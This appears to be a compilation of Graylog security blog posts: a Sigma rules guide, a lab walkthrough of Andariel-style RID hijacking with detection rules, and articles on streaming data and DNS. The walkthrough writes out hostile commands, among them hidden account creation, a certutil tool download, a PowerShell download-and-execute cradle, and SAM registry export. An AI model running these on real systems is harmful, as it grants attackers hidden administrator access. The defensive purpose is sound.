
The Ultimate Guide to Sigma Rules

In cybersecurity as in sports, teamwork makes the dream work. In a world where security analysts can feel constantly bombarded by threat actors, banding together to share information and strategies is increasingly important. Over the last few years, security operations center (SOC) analysts have started sharing open-source Sigma rules to create and exchange detections that help level the playing field.

By understanding what Sigma rules are and how to use them, you can leverage their capabilities, optimizing your centralized log management solution for security detection and response.

What are Sigma Rules?

Introduced in 2017 by detection engineer Florian Roth and open-source security tool developer Thomas Patzke, Sigma is a text-based, generic, open signature format that analysts can use to describe log events, making detections easier to write. Since Sigma uses YAML, its syntax is human-readable, so people can easily read and understand the detection rules.

As a generic detection rule format, Sigma creates a common shared language for defenders, overcoming the challenges that they face trying to write rules in proprietary Security Information and Event Management (SIEM) platforms. Security analysts can share rules using the Sigma format, then convert them into the SIEM-specific language.

Similar to how YARA rules use Indicators of Compromise (IoC) to help identify and classify malware files, Sigma rules match criteria to log events to help detect incidents. Sigma rules can contain any or all of the following fields:

  • Title
  • Status, such as experimental, test, or stable
  • Description of what it detects
  • Author name
  • Date
  • ID
  • License, assuming the author shares the rule
  • Level
  • Data or log source
  • Set of conditions
  • Tags, including MITRE ATT&CK mappings
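Put together, a minimal rule touching most of these fields might look like the following sketch (all values here are illustrative, not a published rule):

```yaml
title: Suspicious Whoami Execution
id: 11111111-2222-3333-4444-555555555555   # illustrative placeholder UUID
status: experimental
description: Detects execution of whoami.exe, often run by attackers after gaining access
author: Jane Analyst                       # illustrative
date: 2024/01/15
tags:
    - attack.discovery
    - attack.t1033
level: low
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\whoami.exe'
    condition: selection
```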

 

Why use Sigma Rules?

With Sigma rules, security analysts can collaborate more effectively and efficiently.

Standardization

Sigma standardizes the detection rule format across SIEM and log management platforms. Since each rule uses the same fields and structure, security analysts can use a converter that translates the open-source detection into the format their security system uses.

Collaboration

For defenders, collaboration is a fundamental benefit. Before Sigma, security analysts could only share detections with other people who used the same SIEM or log management system. With open-source Sigma rules, defenders can share tested and untested rules on GitHub to build stronger detections.

Further, by collaborating, defenders can share knowledge. With people across all experience levels sharing detections, security analysts can bridge the cybersecurity skills gap, enhancing everyone’s security.

Flexibility

From a business perspective, Sigma rules give companies a way to evolve their cybersecurity technology stack in a way that makes sense for them. The ability to convert the rules to a vendor’s format means that security teams can shift from one technology to another more easily, avoiding costly vendor lock-in or enabling them to mature their operations as necessary.

Sigma Rule Use Cases

With Sigma, you can uplevel your security in proactive and reactive ways.

Suspicious Activity Alerts

To improve your reactive security, you can build Sigma rules to detect suspicious activity. Using the activity that your log data captures, you can build rules that detect almost anything, including:

  • Unauthorized actions
  • Web/resource access
  • File modification
  • Process creation

 

As you get more comfortable building detection rules, you can correlate more log data for meaningful, high-fidelity alerts.

Threat Hunting

Once you have a set of robust alerts, you can start using Sigma rules to mature your proactive security monitoring, too. With a centralized log management solution aggregating old log data, you can build Sigma detections based on threat intelligence and proactively search for activity indicating attackers hiding in your systems.

The Anatomy of a Sigma Rule

Writing Sigma rules doesn’t need to be hard, but the more correlations you build into the rule, the more difficult writing it becomes.

An example of a short Sigma rule is one that identifies potential brute-force or credential-theft attacks.


Azure Account Lockout Sigma Rule
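As a sketch based on the public SigmaHQ Azure rules (not the verbatim published rule), the account lockout detection looks roughly like this:

```yaml
title: Account Lockout
status: experimental
description: Detects Azure AD account lockouts, which may indicate brute force or credential theft attempts
tags:
    - attack.credential_access
    - attack.t1110
logsource:
    product: azure
    service: signinlogs
detection:
    selection:
        ResultType: 50053
    condition: selection
falsepositives:
    - Users repeatedly mistyping their passwords
level: medium
```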

Identify Use Case

The first step to building a Sigma rule is deciding what activity you need to find.

In the example detection, the authors define the use case in the tags as an attack at the credential and access level.

They also map this activity to MITRE ATT&CK Technique T1110 (Brute Force), which covers:

  • Password guessing (T1110.001)
  • Password cracking (T1110.002)
  • Password spraying (T1110.003)
  • Credential stuffing (T1110.004)

Determine Log Source/Data Source

Since your Sigma rule relies on log data, you need to identify what sources apply. When writing the rule, you may want to include both the product and the service.

Breaking down the example detection, you can see that the logsource in this case is the Azure sign-in logs:
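In Sigma's YAML, a logsource block for Azure sign-in logs typically names both the product and the service (values follow SigmaHQ's Azure convention):

```yaml
logsource:
    product: azure
    service: signinlogs
```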


Define the Detection

As you continue to build your rule, you also dig deeper into the logsource data. When you define the detection, you look at the log fields that alert you to specific activity.

In this example, the detection matches sign-in log entries containing Azure AD authentication error 50053:
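In Sigma syntax (the field name here is assumed from the Azure sign-in log schema), that detection might be written as:

```yaml
detection:
    selection:
        ResultType: 50053
```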

Set the Condition

When you set the condition, you define what the rule “looks for” in the defined log.

In this case, since the log needs to have the required error, you set it as follows:
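Since this rule has a single selection that must match, the condition is just a reference to it at the end of the detection block, sketched here:

```yaml
detection:
    selection:
        ResultType: 50053
    condition: selection
```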

Additional Fields and Complexity

Although valuable, this example is a fairly simple rule. As you try to reduce noise across your monitoring environment, you may incorporate additional information, like:

  • More than one log source
  • More than one detection
  • Filters
  • Multiple conditions
  • Indicators of false positives

 

A good example of a more complex Sigma rule is the Sign-In Failure for Bad Password Threshold:


Azure Sign-In Failure Bad Password Threshold
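A hedged sketch of such a threshold rule (field names, values, and the filter are illustrative, not the verbatim published rule) shows how selections, filters, and an aggregating condition combine:

```yaml
title: Sign-in Failure Bad Password Threshold
status: experimental
description: Detects many failed sign-ins with a bad password for the same account, suggesting password guessing
tags:
    - attack.credential_access
    - attack.t1110
logsource:
    product: azure
    service: signinlogs
detection:
    selection:
        ResultType: 50126                   # invalid username or password
    filter:
        UserPrincipalName|contains: 'svc-'  # hypothetical: exclude noisy service accounts
    condition: selection and not filter | count() by UserPrincipalName > 10
falsepositives:
    - Users who forgot their password
level: medium
```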

Graylog Security: Sigma Rule Event Processor for Advanced Detection Capabilities

With Graylog Security, you get the security functionality of a SIEM and an intuitive user interface that makes managing security faster. With our Sigma Rule Event Processor, you can import the rules you want to use directly from GitHub, and we automatically associate each rule with an event definition, which you can customize, giving you a way to rapidly mature your detection capabilities.


By combining Sigma rules with Graylog’s lightning-fast speed, you can create the high-fidelity alerts you need and investigate them rapidly, improving key metrics like Mean Time To Detect (MTTD) and Mean Time To Resolve (MTTR).

About Graylog  
At Graylog, our vision is a secure digital world where organizations of all sizes can effectively guard against cyber threats. We’re committed to turning this vision into reality by providing Threat Detection & Response that sets the standard for excellence. Our cloud-native architecture delivers SIEM, API Security, and Enterprise Log Management solutions that are not just efficient and effective—whether hosted by us, on-premises, or in your cloud—but also deliver a fantastic Analyst Experience at the lowest total cost of ownership. We aim to equip security analysts with the best tools for the job, empowering every organization to stand resilient in the ever-evolving cybersecurity landscape.

About Version 2 Digital

Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

Adversary Tradecraft: A Deep Dive into RID Hijacking and Hidden Users

Researchers at AhnLab Security Intelligence Center (ASEC) recently published a report on the Andariel threat group, a DPRK state-sponsored APT active for over a decade, which has been leveraging RID hijacking and user account concealment techniques to stealthily maintain privileged access to compromised Windows systems.

 

This blog post explores hands-on how RID hijacking and hidden backdoor accounts work in Andariel’s attack chain, and how Graylog Security can be used to detect and analyze similar activity in an organization’s network.

 

What is RID Hijacking?

The RID, or Relative Identifier, uniquely identifies a user in Windows as part of its Security Identifier (SID). When a user logs on, the system retrieves the SID for that user from the local Security Account Manager (SAM) database and places it in the user’s access token to identify it in subsequent interactions. The local Administrator account RID is always 500, and standard user RIDs usually start at 1001.

RID hijacking is a technique discovered by Sebastian Castro that involves modifying the RID value of a low-privileged account to match the value of a privileged account such as local Administrator by manipulating the SAM database. As a result, the operating system mistakenly grants elevated privileges to the originally restricted account, allowing the attacker to execute privileged commands as that user.

This technique is particularly stealthy because the activity in event logs will still be associated with the low-privilege user and there is often less scrutiny applied to standard accounts.

However, there is a caveat to the technique – it requires SYSTEM level privileges to access and modify user information in the SAM, which resides in a protected registry key.

 

Attack Demonstration

According to the report from AhnLab, the threat actor’s RID hijacking process consists of the following stages. We’ll use this model as we walk through the attack in a lab environment.

The RID Hijacking attack process referenced from AhnLab

 

Our lab consists of a Windows 10 Enterprise system with auditing enabled for process execution (command line included), account logon and management, registry, and SAM access. Script block logging is also turned on.

 

System, Security, and PowerShell/Operational event logs are sent via Winlogbeat to a Graylog Enterprise 6.0.1 instance with Illuminate 6.1 installed to enable parsing and enrichment.

 

Stage 1: SYSTEM Privilege Escalation

 

We’ll assume initial access to the Windows system and start off with an elevated admin user. However, in order to access the SAM registry hive, we need SYSTEM privileges. To do this, we can use exploits like JuicyPotato or tools like PsExec, a Microsoft Sysinternals tool often abused by adversaries for lateral movement and privilege escalation. We’ll spawn a PowerShell session using PsExec with the -s argument:

 

PsExec.exe -s -i powershell.exe

 

The output of whoami /user in the shell confirms that we’re now running as SYSTEM.

Whoami Output  

In Graylog, we can see a common indicator of Sysinternals PsExec activity, Event ID 7045 Remote Service Creation with the default service name PSEXESVC. Following the subsequent events (ordered bottom to top) we see our whoami command executed as Local System.

Command Executed  

Stage 2: Create User Account

 

Having obtained SYSTEM, the adversary proceeded to create a hidden local user account and add it to privileged groups. These are the commands used:

net user admin$ admin@123 /add
net localgroup "Remote Desktop Users" "admin$" /add
net localgroup "Administrators" "admin$" /add

 

The trick to hiding the user here is the $ at the end of the username. It’s an old-school technique that imitates computer accounts, which are hidden from some user-listing interfaces. Note that the newly created user isn’t shown in the output of net user.

net user

In Graylog we see the commands as event ID 4688 labeled as “process started”, and additional labels for 4720 “account created” and 4732 “group member added”.

ID 4688 and 4720

 

Stage 3: Modify the RID Value in Registry

 

Before demonstrating the RID hijack, let’s see what the current RID value and permissions are for the user admin$. We’ll open a separate command prompt and spawn a shell as that user using runas:

runas /user:admin$ cmd

 

Then, execute whoami commands in that shell. As shown, the user’s current RID is 1009 and its privileges are limited as expected for a standard user.

RID Value

Well, as the chefs say, elevate it!

 

Back to the PowerShell session as SYSTEM, we can run regedit.exe to open the GUI registry editor in the same privilege context.

 

User information is stored in the SAM hive in unique subkeys under:

HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users

 

Each subkey corresponds to an account where the key name is the hexadecimal representation of the decimal user RID. The value 1009 for admin$ translates to 0x3F1, so we’re looking at the key 000003F1.

Hex Value

Within key 000003F1, the actual RID can be found in the value F, which contains binary data. As highlighted, the RID value is located at offset 0x30 and stored in little-endian format.

SAM Key

To execute the hijack, we need to overwrite this value with the local Administrator RID of 500 (0x1F4) converted to little-endian as shown below.

Hex Key Value
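Both conversions are easy to reproduce; this short Python snippet (purely illustrative, not part of any attack tooling) prints the SAM subkey name for RID 1009 and the little-endian bytes that encode RID 500:

```python
import struct

# SAM user subkeys are named with the zero-padded hex form of the decimal RID
print(f"{1009:08X}")                             # -> 000003F1

# The F value stores the RID as a 32-bit little-endian integer, so
# Administrator's RID 500 (0x1F4) is written as the byte sequence:
print(struct.pack("<I", 500).hex(" ").upper())   # -> F4 01 00 00
```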

 

 

With that modification, admin$ should now be given the elevated RID 500 upon logon. If we open a new command prompt as the user and run whoami /user, we see the new hijacked RID, though the rest of the SID stays unchanged. Running whoami /priv shows that the user has been granted admin privileges.

RID 500

We can hunt in Graylog for activity associated with non-Administrator accounts that have the RID 500 using the following query:

NOT user_name:administrator AND user_id:/.*\-500/

Administrator user 500

This query might produce false positives if the Administrator account has been renamed. We can refine it to target both RID hijacking and user accounts mimicking machine names:

user_name:/.*\$/ AND user_id:/.*\-500/

 

Custom and Open-source Tooling


Manually altering SAM user information in the registry editor is good for demonstration, but it isn’t necessarily what threat actors are doing.

 

The AhnLab report details that Andariel utilized two distinct custom tools to automate the RID hijacking attack process. One of the tools named CreateHiddenAccount is open-source and available on GitHub.

 

AhnLab breaks down the differences between the tools quite well in its report:

Differences in tool behavior referenced from AhnLab

 

 

CreateHiddenAccount is particularly interesting since it can work without SYSTEM privileges. It still needs access to the SAM registry key, so it employs the Windows CLI program regini to edit the registry through a .ini file. The file contains parameters to open up the SAM registry key access permissions to allow modification with administrator privileges.

 

 

Let’s execute the CreateHiddenAccount tool in a fresh Graylog lab to see what events are produced. First, download the UPX packed variant to the Windows host.

 

certutil.exe -urlcache -split -f https://github.com/wgpsec/CreateHiddenAccount/releases/download/0.2/CreateHiddenAccount_upx_v0.2.exe CreateHiddenAccount_upx_v0.2.exe

 

The command-line arguments require the name of the hidden user to create (the $ is appended automatically) and the target user whose RID will be cloned. Here, we’re again creating the user admin$ and targeting the local Administrator RID.

CreateHiddenAccount_upx_v0.2.exe -u admin -p admin@123 -cu Administrator

Create Hidden Account

 

The tool produces some interesting events to analyze in Graylog. Directly after execution we see regini.exe being used to modify the access control rules of the SAM registry key.

Regini Being Used

Following that is a flurry of user enumeration events and account creation for admin$. Interestingly, we then see the tool deleting the hidden user and silently importing a .reg file using regedit. What’s happening here is that the tool populated the import file with information from the user’s registry key before deletion, modifying the RID in the file to match Administrator’s. This is an additional step to hide the created user: once the registry key is restored, the user is hidden from additional user-listing interfaces.

Enumeration Events

Those with their detection hat on might notice that the filenames are notably unique and static throughout the tool execution. These names are actually hardcoded in the source code, seen in the function below.

Tool Execution

This presents an opportunity to detect CreateHiddenAccount execution via child process command lines where the unique filenames are present. Note though that this is considered a brittle detection – while it can reliably identify this particular version of CreateHiddenAccount unmodified, it is trivial for the adversary to change these filenames in the source before compiling to an executable.

 

Nonetheless, it’s useful in a threat hunt or to detect the vanilla tool. We can use the following query:

process_command_line:(/.*N2kvMLEQiiHHNWXFpEg7uaNmcu9ic95j8\.ini/ OR /.*sTRmxJkRFoTFaPRXBeavZhjaAYNvpYko\.reg/)

Process Command Line

 

The tool by itself doesn’t do much in the way of behavior obfuscation or sandbox evasion. Querying its hash on VirusTotal returns some damning results.

VirusTotal

 

Further Attempts to Hide Users

 

In addition to hiding the backdoor user account with a username ending in $, the custom tool used by Andariel attempts to further conceal the account through deletion and registry import operations. We analyzed a similar feature in CreateHiddenAccount, but now we’ll carry out the technique separately and see what can be gleaned from the logs.

 

As demonstrated below, we repeat the steps of SYSTEM privilege escalation and hidden user account creation, but this time we run a PowerShell download cradle to fetch and execute, in memory, a RID hijacking script from GitHub. This grants the account administrator privileges but takes no further action to conceal it.

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/r4wd3r/RID-Hijacking/master/Invoke-RIDHijacking.ps1'); Invoke-RIDHijacking -User 'admin$' -RID 500

Powershell Script Run

 

Graylog Illuminate captures the PowerShell script execution and even extracts the SAM registry key path being modified for RID hijacking.

Fake Computer Name

Even with the fake computer name, the hidden user still shows up in Computer Management.

Computer Fake Name

 

Following along with the Andariel threat group’s tool methods, we run commands to:

 

A) Fetch the hidden user’s RID

Get-WmiObject Win32_UserAccount | Where-Object { $_.Name -eq 'admin$' } | Select-Object Name, SID

 

B) Export the hidden user’s associated registry keys in the SAM hive

reg export hklm\sam\sam\domains\account\users\names\admin$ names.reg
reg export hklm\sam\sam\domains\account\users\0000XXXX users.reg

 

C) Delete the user

net user admin$ /delete

 

D) Restore the user by importing the registry files containing the user keys information

reg import names.reg
reg import users.reg

 

By using this method, admin$ is no longer displayed in Computer Management, at least until a system reboot.

No Admin User Shown

 

Every step of the execution can be seen in Graylog.

Attack Steps Log

 

Detections

 

We’ve provided Sigma rules below to detect the following aspects of the attack chain:

 

  • Hidden user account with Administrator RID
  • RID hijacking via CreateHiddenAccount
  • Export of SAM users registry keys via reg.exe

 

With Graylog Security, we can manually add these rules and configure timed search intervals to detect the activity in our log ingest.

 

The Sigma engine in Graylog provides an option to search the logs using the detector before deployment. This way you can also see the exact search query the rule translates to.

Sigma Rule Added

Rule #1

title: Illuminate - Hidden User Account With Administrator RID
id: 531bfab7-d18c-4f51-bae0-64cf38cae3d5
status: experimental
description: Detects special privileges assigned to a hidden account manipulated with admin RID hijacking
references:
    - https://asec.ahnlab.com/en/85942/
author: JL (Graylog)
date: 2025/02/04  # Graylog format
tags:
    - attack.privilege_escalation
    - attack.t1078
    - attack.persistence
    - attack.t1098
logsource:
    product: windows
    service: security
detection:
    selection_event:
        EventID: 4672
    selection_name:
        SubjectUserName|endswith: '$'
    selection_rid:
        SubjectUserSid|endswith: '-500'
    condition: all of selection*
falsepositives:
    - Unknown
level: high

Rule #2

title: Illuminate - RID Hijacking Via CreateHiddenAccount
id: 8b8fdf38-4e34-4d7b-bdaa-b3b9920fb80b
status: experimental
description: Detects the open-source tool CreateHiddenAccount (unmodified) used by Andariel threat group for RID hijacking
references:
    - https://github.com/wgpsec/CreateHiddenAccount/
    - https://asec.ahnlab.com/en/85942/
author: JL (Graylog)
date: 2025/02/04  # Graylog format
tags:
    - attack.privilege_escalation
    - attack.t1078
    - attack.persistence
    - attack.t1136.001
    - attack.t1098
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains:
            - 'N2kvMLEQiiHHNWXFpEg7uaNmcu9ic95j8'   # regini .N2kvMLEQiiHHNWXFpEg7uaNmcu9ic95j8.ini
            - 'sTRmxJkRFoTFaPRXBeavZhjaAYNvpYko'    # regedit /s .sTRmxJkRFoTFaPRXBeavZhjaAYNvpYko.reg
    condition: selection
falsepositives:
    - Unknown
level: high

Rule #3

title: Illuminate - Export of SAM Users Registry Keys Via Reg.exe
id: 0709625a-4703-47ba-acfd-3beaa4d0f1dc
status: experimental
description: Detects export of SAM user account information via reg export
references:
    - https://asec.ahnlab.com/en/85942/
author: JL (Graylog)
date: 2025/02/04  # Graylog format
tags:
    - attack.credential_access
    - attack.t1003.002
    - attack.persistence
    - attack.t1098
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|all:
            - 'export'
            - 'hklm\sam\sam\domains\account\users\'
    condition: selection
falsepositives:
    - Administrative scripts or forensic investigations
level: high

Graylog Detections

Graylog has provided the Sigma rules here to share threat detection intelligence with those not running Graylog Security. Note that Graylog Security customers receive a content feed including Sigma Rules, Anomaly Detectors, Dashboards, and other content to meet various security use cases. For more about Sigma rules, see our recent blog “The Ultimate Guide to Sigma Rules.”

To learn how Graylog can help you improve your security posture, contact us today or watch a demo.


Using Streaming Data for Cybersecurity

After a long day, you sit down on the couch to watch your favorite episode of I Love Lucy on your chosen streaming platform. You decide on the episode where Lucy can’t keep up with the chocolates on the conveyor belt at the factory where she works. Without realizing it, you’re actually watching an explanation of how the streaming platform – and your security analytics tool – work.

 

Data streaming is the real-time processing and delivery of data. Just like those chocolates coming through on the conveyor belt, your security analytics and monitoring solution collects, parses, and normalizes data so that you can use it to understand your IT environment and potential threats to your security.

 

Using streaming data for cybersecurity may present some challenges, but it also drives the analytics models that allow you to improve your threat detection and incident response program.

What is streaming data?

Streaming data is a continuous flow of information processed in real time that businesses can use to gain insights immediately. Since the data typically appears in chronological order, organizations can apply analytics models to identify or predict changes.

 

The key characteristics of streaming data include:

  • Continuous flow: non-stop real-time data processed as it arrives
  • Sequential order: data elements in chronological order for consistency
  • Timeliness: rapid access for time-sensitive decision-making and activity

 

Continuous streaming data enables security professionals to detect patterns and identify anomalies that may indicate a potential threat or incident. Most security telemetry is streaming data, like:

  • Access logs
  • Web application logs
  • Network traffic logs

 

Streaming Data vs. Static Data

Streaming data and static data differ significantly in their characteristics and applications. While static data is fixed and collected at a single point in time, streaming data is continuous and time-sensitive, containing timestamps.

Timeliness

When using data for security use cases, timeliness is a key differentiator:

  • Static data: fixed, point-in-time snapshot
  • Streaming data: continuous, real-time, no defined end

Sources

For security professionals, this difference is often the one that makes managing and using security data challenging:

  • Static data: typically fewer, defined sources
  • Streaming data: large numbers of diverse geographic locations and technologies

Format

When managing security telemetry, format is often the most challenging difference that you need to manage:

  • Static data: uniform and structured
  • Streaming data: various formats, including structured, unstructured, and semi-structured

Analytics Use

The key difference that matters for security teams is how to use the data with analytics models:

  • Static data: mostly historical insights
  • Streaming data: predictive analytics and anomaly detection

 

What are the major components of a stream processor?

With a data stream processor, you can get timely insights by analyzing and visualizing your security data.

Data stream management

Data stream management involves data storage, processing, analysis, and integration so that you can generate visualizations and reports. Typically, these technologies have:

  • Data source layer: captures and parses data
  • Data ingestion layer: handles the flow of data between source and processing layers
  • Processing layer: filters, transforms, aggregates, and enriches data by detecting patterns
  • Storage layer: ensures data durability and availability
  • Querying layer: tools for asking questions and analyzing stored data
  • Visualization and reporting layer: produces visualizations, like charts and graphs, to help generate reports
  • Integration layer: connects with other technologies

Complex event processing

Complex event processing identifies meaningful patterns or anomalies within the data streams. The components of complex event processing include:

  • Event Detection: Identifies significant occurrences within incoming data streams.
  • Insight Extraction: Derives actionable information from detected events.
  • Rapid Transmission: Ensures swift communication to higher layers for real-time action.

These functionalities are critical for real-time analysis, threat detection, and response.
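As a toy sketch of these components in Python (hypothetical event shape, not a real product API), the generator below detects a simple pattern, repeated failed logins by a single user, in an event stream:

```python
from collections import defaultdict

def detect_bruteforce(stream, threshold=3):
    """Toy complex event processing: emit an alert when a user
    produces `threshold` consecutive failed logins."""
    failures = defaultdict(int)
    for event in stream:                              # event detection
        if event["result"] == "failure":
            failures[event["user"]] += 1
        else:
            failures[event["user"]] = 0               # a success resets the counter
        if failures[event["user"]] == threshold:      # insight extraction
            yield {"alert": "possible brute force",   # rapid transmission upstream
                   "user": event["user"]}

events = [
    {"user": "alice", "result": "failure"},
    {"user": "alice", "result": "failure"},
    {"user": "bob",   "result": "success"},
    {"user": "alice", "result": "failure"},
]
print(list(detect_bruteforce(events)))
# -> [{'alert': 'possible brute force', 'user': 'alice'}]
```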

Data collection and aggregation

Data collection and aggregation organizes the incoming data, normalizing it so that you can correlate various sources and extract insights. Real-time data analysis through streaming enhances an organization’s ability to detect and respond to cyber threats promptly, improving overall security posture. Continuous monitoring and strong security measures are pivotal to protecting data integrity in transit.

Continuous logic processing

Continuous logic processing underpins the core of a stream-processing architecture by executing queries on incoming data streams to generate useful insights. This subsystem is crucial for real-time data analysis, ensuring the prompt insights essential for maintaining vigilance against potential cybersecurity threats.

 

What are the data streaming and processing challenges with cybersecurity telemetry?

Data streaming and processing come with several challenges for cybersecurity teams who deal with data heterogeneity that impacts their ability to detect and investigate incidents.

Data Volume and Diversity

Modern IT environments generate high volumes of data in disparate formats, and security analysts often struggle to normalize the different formats across their logs.

Chronological order

Data streams enable you to use real-time data to promptly identify anomalies or detect security incidents. However, as the data streams in, you need to ensure that you can organize it chronologically, especially when you need to write your security incident report.

Scalability

The increasing volume of stream data necessitates that processing systems adapt dynamically to varying loads to maintain quality. For example, you may need to scale up your analytics – and therefore data processing requirements – when engaging in an investigation.

 

Benefits of data streaming and processing for cybersecurity teams

When you use real-time data streaming, you can move toward a proactive approach to cybersecurity, enabling real-time detections and faster incident response. Data pipeline management can also help you save costs by routing data where you want it.

 

Infrastructure Cost Reduction

When you use streaming data, you can build a security data lake strategy that involves data tiering. You can reduce the total cost of ownership by optimizing the balance of storage costs and system performance. For example, you could have the following three tiers of data:

  • Hot: data needed immediately for real-time detections
  • Warm: data stored temporarily in case you need it to investigate an alert
  • Cold: long term data storage for historical data or to meet a retention compliance requirement

When you can store cold data in a cheaper location, like an S3 bucket, you reduce overall costs.

 

 

Improve Detections

Streaming data enables you to parse, normalize, aggregate, and correlate log information from across your IT environment. When you use real-time data, you can detect threats faster, enabling you to mitigate the damage an attacker can do. The aggregation and correlation capabilities enable you to create high-fidelity alerts so you can focus on the potential threats that matter to your systems, networks, and data. Additionally, since streaming data is already processed, it is easier to enrich and integrate with other data sources.
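The parse-and-normalize step can be sketched as follows. Both input shapes and all field names (`hostname`, `username`, `event`) are hypothetical stand-ins for whatever formats your environment actually emits:

```python
import json
import re

# Hypothetical space-delimited format: "<host> <user> <action>"
SYSLOG_RE = re.compile(r"^(?P<host>\S+) (?P<user>\S+) (?P<action>\S+)$")

def normalize(raw):
    """Map a JSON or space-delimited log line onto one common schema."""
    if raw.lstrip().startswith("{"):
        record = json.loads(raw)
        # Source field names here are illustrative, not a real vendor schema
        return {"host": record["hostname"], "user": record["username"], "action": record["event"]}
    match = SYSLOG_RE.match(raw)
    if match is None:
        raise ValueError(f"unrecognized log line: {raw!r}")
    return match.groupdict()
```

Once every source lands in the same `{host, user, action}` shape, downstream aggregation and correlation rules only have to be written once.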

Apply Security Analytics

Security analytics are analytics models focused on cybersecurity use cases, like:

  • Security hygiene: how well your current controls work
  • Security operations: anomaly detection, like identifying abnormal user behavior
  • Compliance: identifying security trends like high severity alerts by source, type, user, or product

For example, anomaly detection analytics identify behaviors within data that do not conform to expected norms, enabling you to prevent or detect unauthorized access or potential data exfiltration attempts.
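One minimal form of that anomaly detection is a z-score check against a per-user baseline. The 3-sigma default below is an illustrative starting point, not a recommended production threshold:

```python
from statistics import mean, stdev

def is_anomalous(history, observed, threshold=3.0):
    """Flag `observed` if it sits more than `threshold` standard deviations
    from the mean of `history` (e.g. a user's daily login counts)."""
    if len(history) < 2:
        return False  # not enough data to establish a baseline
    mu, sigma = mean(history), stdev(history)
    if sigma == 0:
        return observed != mu  # flat baseline: any change is anomalous
    return abs(observed - mu) / sigma > threshold
```

A user who normally logs in about ten times a day would be flagged at fifty logins but not at eleven.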

 

Graylog Security: Real-time data for improved threat detection and incident response

Graylog Enterprise and Graylog Security ensure scalability as your data grows, reducing total cost of ownership (TCO). Our platform’s data tiering, built on data pipeline management, facilitates efficient storage management by automatically organizing data to optimize access and minimize costs without compromising performance.

 

With frequently accessed data kept on high-performance systems and less active data in more cost-effective storage, you can leverage Graylog Security’s built-in content to uplevel your threat detection and incident response (TDIR) processes. Our solution combines MITRE ATT&CK’s knowledge base of adversary behavior with vendor-agnostic Sigma rules so you can rapidly respond to incidents, improving key cybersecurity metrics. By combining the power of MITRE ATT&CK and Sigma rules, you can spend less time developing custom detection content and more time focusing on critical tasks.

 

About Graylog  
At Graylog, our vision is a secure digital world where organizations of all sizes can effectively guard against cyber threats. We’re committed to turning this vision into reality by providing Threat Detection & Response that sets the standard for excellence. Our cloud-native architecture delivers SIEM, API Security, and Enterprise Log Management solutions that are not just efficient and effective—whether hosted by us, on-premises, or in your cloud—but also deliver a fantastic Analyst Experience at the lowest total cost of ownership. We aim to equip security analysts with the best tools for the job, empowering every organization to stand resilient in the ever-evolving cybersecurity landscape.

About Version 2 Digital

Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

DNS Security Best Practices for Logging

Your Domain Name System (DNS) infrastructure enables users to connect to web-based resources by translating everyday language into IP addresses. Imagine going into a restaurant, in the age before the internet, only to find that the staff speaks and the menu is written in a different language from yours. Without some shared communication form, you can’t order dinner, and they can’t give you what you want. Finally, someone comes into the restaurant who speaks both languages, acting as the translator so you can get the service you need.

 

Your DNS infrastructure is that translator for your digital operations, keeping services connected. However, when malicious actors target your DNS, a successful attack can lead to downtime or a data breach.

 

To mitigate risk, you should implement some DNS security best practices, including knowing what logs help you monitor for and detect a potential incident.

 

What is DNS security?

DNS security refers to the measures taken to protect the Domain Name System (DNS) infrastructure from cyber attacks. DNS translates a human-readable URL (Uniform Resource Locator) into a machine-readable IP address, routing user requests to the appropriate digital resources.
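That translation step is what every DNS client performs under the hood; a minimal sketch using Python's standard library looks like this:

```python
import socket

def resolve(hostname):
    """Return the IPv4 addresses a name lookup yields for `hostname`."""
    infos = socket.getaddrinfo(hostname, None, family=socket.AF_INET)
    # getaddrinfo returns (family, type, proto, canonname, sockaddr) tuples;
    # the address is the first element of sockaddr
    return sorted({info[4][0] for info in infos})
```

Every one of these lookups is an event worth logging: the query name, the answer, and who asked are the raw material for the detections discussed below.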

 

Cyber attacks against the DNS infrastructure can lead to:

  • Website defacement
  • Traffic hijacking sending users to malicious websites or intercepting communications
  • Unauthorized access to sensitive information
  • Distributed Denial of Service (DDoS) attacks causing service outages and business interruption

 

DNS security controls typically include:

  • Redundancy: Using multiple DNS servers spread across different locations to prevent a single point of failure
  • DNS Security Extensions (DNSSEC): Protocols providing authentication and data integrity
  • DNS logging: Monitoring for and detecting malicious activities

 

Why is DNS security important?

The history of DNS gives insight into why it is not an inherently secure technology. When DNS was created in 1983 so people could more easily navigate the nascent internet, no one predicted that this new connectivity would become critical to daily operations.

Your DNS infrastructure acts as the foundation for your digital business operations, meaning service disruptions lead to downtime and lost revenue.

 

A successful attack against your DNS infrastructure can lead to:

  • Business disruption: Without the ability to translate URLs into IP addresses, users and customers cannot connect to digital services.
  • Lost revenue: Without the ability to connect to services, customers cannot engage in transactions, like being able to purchase items in an e-commerce store.
  • Data breach: Compromising DNS services can lead to unauthorized data transfers, modification, or access that impact sensitive data’s integrity and privacy.
  • Compliance risk: DNS is included in various compliance frameworks and mandates, including the Payment Card Industry Data Security Standard (PCI DSS) and International Organization for Standardization (ISO) 27002-2022

 

6 DNS Attack Types and How to Prevent Them

As attackers increasingly target the DNS infrastructure, knowing these six common attack types can help you implement security controls and the appropriate monitoring to mitigate risk.

 

DoS and DDoS

Many attacks against the DNS infrastructure fall into these categories, even if they use different methodologies for achieving the objective. Although similar, you should understand the following differences:

  • Denial of Service (DoS): one computer using one internet connection sends high volumes of traffic to a remote server
  • Distributed Denial of Service (DDoS): multiple devices across multiple internet connections target a resource, often using a botnet consisting of devices infected with malware

 

